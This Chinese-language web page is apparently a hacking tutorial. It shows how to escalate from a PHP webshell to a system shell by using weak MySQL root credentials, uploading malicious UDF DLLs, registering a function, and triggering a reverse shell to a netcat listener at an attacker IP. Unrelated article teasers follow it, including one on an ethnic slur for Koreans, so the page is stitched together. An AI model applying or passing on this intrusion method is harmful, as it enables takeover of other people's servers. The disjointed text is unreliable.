S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国 *** 安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,如图1
一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。如图2
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3
哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.
出现SQL语句成功执行!如图4
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,如图5
执行成功,然后看看我们的NC有反映没,如图6
春节是中国民间最隆重盛大的传统节日,是集祈福攘灾、欢庆娱乐和饮食为一体的民俗大节。春节历史悠久,由上古时代岁首祈年祭祀演变而来,在传承发展中承载了丰厚的历史文化底蕴。在春节期间,全国各地均有举行各种贺...
为什么叫韩国人棒子(中国人为什么称韩国人“棒子”)高丽棒子(朝鲜语:)是华人对朝鲜半岛的朝鲜民族的贬称。该词早在清代就已出现,但却是清末民国时期尤其是中国抗日战争时期(1931年—1945年)才广...
扫描机是啥,它有什么作用?扫描机能够将实际中的商品的外型扫描仪后传送到电脑上之中,并以文档的方式保存,也可分成黑与白扫描仪和五颜六色扫描仪,那扫描机该怎么使用呢?下边就以win10为例子为大伙儿简易的...
0dcc509a坦桑尼亚 图2: 该医院组织介绍假如你垂头看窗口的底部,你会看到一些浅灰色的文字,上面写着越过登录,直接把我带到了应用程序界面。 点击这个灰色的链接,你将移动到下一个屏幕——一个提示...
近些年,学生创业被大伙儿赞叹不已,愈来愈多的年青创业者发生在大伙儿的工作。乍一听,自主创业仿佛有点儿难,那么多成人自主创业都失败了,何况学生呢?其实不是,学生有学生的优点,最先校园内的人脉关系、我...
异人百科是一人之下手游中的一个问答玩法,该玩法的题库中有大量和原作相关的题目,没有看过原作的玩家估计很难作答。下面就是优游网小编为大家整理的一人之下手游异人百科答案大全了,不了解原作剧情的小伙伴们一起...